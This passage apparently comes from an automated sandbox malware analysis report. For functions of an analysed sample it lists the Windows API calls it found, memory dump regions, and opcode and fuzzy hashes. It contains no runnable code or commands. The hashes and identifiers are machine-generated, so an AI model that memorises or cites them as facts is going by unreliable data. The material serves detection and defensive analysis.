                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                              • String ID:
                                              • API String ID: 1389676194-0
                                              • Opcode ID: 1e8c29daf7834bcd4c1a13f6836a33e8c870c9de51db38f2345a77574bf96f7d
                                              • Instruction ID: 0dbc1dddae5b4f5edfe6d729659bc166eed39fee89411fd3c29819a9e56fae4a
                                              • Opcode Fuzzy Hash: 1e8c29daf7834bcd4c1a13f6836a33e8c870c9de51db38f2345a77574bf96f7d
                                              • Instruction Fuzzy Hash: CE510A35A00609DFCB01EF64C981AADBBF5EF09355B1480E9E819AB361DB31ED15DF50
                                              Function 00BDA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
                                              • Instruction ID: 837725c2ec30b1cecbb31c3bc513095c6eea42b0c8d3c7bd931b189cb6fb3923
                                              • Opcode Fuzzy Hash: 0238ca337e9c70d8ef8cdc54246b2d9dd9db627a003b39a151d3614606b20de5
                                              • Instruction Fuzzy Hash: D0419035905104AFD724DF28CC99FA9FBE4EB0A310F1542A6E916B73E1EB30AD41DA51
                                              Function 00BA63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA63E7
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00BA6433
                                              • TranslateMessage.USER32(?), ref: 00BA645C
                                              • DispatchMessageW.USER32(?), ref: 00BA6466
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA6475
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                              • String ID:
                                              • API String ID: 2108273632-0
                                              • Opcode ID: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
                                              • Instruction ID: b3d3e32ba7d05e0493b568a9955c54ddb4ec59e9f23509ddaa17dbf6249b4fd2
                                              • Opcode Fuzzy Hash: e98b99383d11a2473011f624ddae0c05b3b8154dc8ff9dcf3b9a8541c89e93d4
                                              • Instruction Fuzzy Hash: 603194B1909646DFDB248F749C84BFABBE8EB07300F1841A5E425C72A1EB359859D750
                                              Function 00BA8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BA8A30
                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00BA8ADA
                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BA8AE2
                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00BA8AF0
                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BA8AF8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              • Opcode ID: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
                                              • Instruction ID: 99f2ac96d5d9ad2996b14af6d9e6d281a1c5b1138d1f6b41153782fc9b3efe1f
                                              • Opcode Fuzzy Hash: c4c15caa46fb10a0c87f0c9b9384f4fc55a417c8c1e73d9c0514b13c7bb7f596
                                              • Instruction Fuzzy Hash: 8A31E071504219EBDF14CFA8D94CAAE7BB5EB05315F10826AF925E75D0DBB09910CB90
                                              Function 00BAB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00BAB204
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BAB221
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BAB259
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BAB27F
                                              • _wcsstr.LIBCMT ref: 00BAB289
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                              • String ID:
                                              • API String ID: 3902887630-0
                                              • Opcode ID: 9ae71a9975a04bc0e5c1cf2b58b21b2ef9f8e5f6704f5926294c019ef91798f7
                                              • Instruction ID: 5ab9bb711509fe66688db91bd34c57863d562ac779ede417a65db95340fc3519
                                              • Opcode Fuzzy Hash: 9ae71a9975a04bc0e5c1cf2b58b21b2ef9f8e5f6704f5926294c019ef91798f7
                                              • Instruction Fuzzy Hash: 5321D332609201BAEB255B759C49E7FBFD8DB4A710F0081BBF819DA1A2EF61DC409660
                                              Function 00BDB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BDB192
                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00BDB1B7
                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BDB1CF
                                              • GetSystemMetrics.USER32(00000004), ref: 00BDB1F8
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BC0E90,00000000), ref: 00BDB216
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Long$MetricsSystem
                                              • String ID:
                                              • API String ID: 2294984445-0
                                              • Opcode ID: fa247c44497478bdf09c5234582ed670d8a03641aaa3b092fb31b576f3cf0844
                                              • Instruction ID: de97e543382c44f8ff237782b3f357a31f9c46cd3093634d832838ca2d77f79d
                                              • Opcode Fuzzy Hash: fa247c44497478bdf09c5234582ed670d8a03641aaa3b092fb31b576f3cf0844
                                              • Instruction Fuzzy Hash: 96217171924251EFCB109F389C54F6ABBE4FB06361B16477AA926D72E0F73098108B90
                                              Function 00BA9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BA9320
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9352
                                              • __itow.LIBCMT ref: 00BA936A
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BA9392
                                              • __itow.LIBCMT ref: 00BA93A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow$_memmove
                                              • String ID:
                                              • API String ID: 2983881199-0
                                              • Opcode ID: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
                                              • Instruction ID: 5d5e5aa2c79838977157d133af85896c7851c2d665f8e905aba186da1a06f67c
                                              • Opcode Fuzzy Hash: a6bb677a85f8173cd4dde3bf5b1433ce5d1da7e55d84a2f21c7b919c07e31f53
                                              • Instruction Fuzzy Hash: A2210731709208ABDF109A609C89EAE7BFCEF4AB10F0480A5FD05D72D0DAB0CD45A795
                                              Function 00BC5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00BC5A6E
                                              • GetForegroundWindow.USER32 ref: 00BC5A85
                                              • GetDC.USER32(00000000), ref: 00BC5AC1
                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00BC5ACD
                                              • ReleaseDC.USER32(00000000,00000003), ref: 00BC5B08
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ForegroundPixelRelease
                                              • String ID:
                                              • API String ID: 4156661090-0
                                              • Opcode ID: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
                                              • Instruction ID: b6779ba382c50132d251980f2f63fae786167ec92b0f9adc63b83d7c35860843
                                              • Opcode Fuzzy Hash: 2417f32e834050247d7ce600ef6cbcbf85e3948e1f78e674e969b26108d97a4c
                                              • Instruction Fuzzy Hash: B5219F35A01104AFD710EF65D884AAABBE9EF48310F1480B9F80A97362DE70ED41CB90
                                              Function 00B512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B5134D
                                              • SelectObject.GDI32(?,00000000), ref: 00B5135C
                                              • BeginPath.GDI32(?), ref: 00B51373
                                              • SelectObject.GDI32(?,00000000), ref: 00B5139C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: c9137ea1a4a31e85cfcd6b719106ccedc578dbfbae7fd53f9d31763fa03200c0
                                              • Instruction ID: d2250bdebbea5a3b3ae303cf63a0962f9b57108ff75f7bbb29f38047b5192839
                                              • Opcode Fuzzy Hash: c9137ea1a4a31e85cfcd6b719106ccedc578dbfbae7fd53f9d31763fa03200c0
                                              • Instruction Fuzzy Hash: EA219D30841608EFEB109F29DC54BAD7BE9FB42322F1486A6F811971F0D770989ACF94
                                              Function 00BABC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
                                              • Instruction ID: 12a45b54ab33a10c3d9ce708e4caf34370626f5c5107e7ebdc4e724541c028a5
                                              • Opcode Fuzzy Hash: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
                                              • Instruction Fuzzy Hash: 7501B5716081497BD7046B1A9D82FBBB3DCDE12398F1484A1FD29A7343FB50EE1096B0
                                              Function 00BB4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 00BB4ABA
                                              • __beginthreadex.LIBCMT ref: 00BB4AD8
                                              • MessageBoxW.USER32(?,?,?,?), ref: 00BB4AED
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BB4B03
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BB4B0A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
                                              • Instruction ID: 132aa4f4a1f29f5dfdcbddccefdf0279074c0d79684ca02f6d48535d049de43e
                                              • Opcode Fuzzy Hash: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
                                              • Instruction Fuzzy Hash: 2D11A576909615BBC7119FA89C04BEE7FECFB86320F1482A6F925D3251D7B5C90487A0
                                              Function 00BA8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                              • GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                              • RtlAllocateHeap.NTDLL(00000000,?,00BA7CE2), ref: 00BA823E
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                              • String ID:
                                              • API String ID: 883493501-0
                                              • Opcode ID: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                              • Instruction ID: 291fa26f7870a52a92be68aa57c6798e7b0324fbd62b13b0b1ac2809fdb1a288
                                              • Opcode Fuzzy Hash: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                              • Instruction Fuzzy Hash: 4C016D71609205FFDB204FA5DC58D7BBBACEF8A754B50047AF90AC3220EE318D00CA60
                                              Function 00BA710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CLSIDFromProgID.COMBASE ref: 00BA7127
                                              • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00BA7142
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                              • CoTaskMemFree.COMBASE(00000000), ref: 00BA7160
                                              • CLSIDFromString.COMBASE(?,?), ref: 00BA716C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                              • Instruction ID: 75355857a1ce1a812e6dff0b5c09efad2f4284e202aca33413784c3a799def40
                                              • Opcode Fuzzy Hash: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                              • Instruction Fuzzy Hash: 22017C7260E205ABDB118F64DC44AAABBEDEB457A1F1440A5FD05E3220EF32DD409BA0
                                              Function 00BB5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5260
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB526E
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5276
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB5280
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
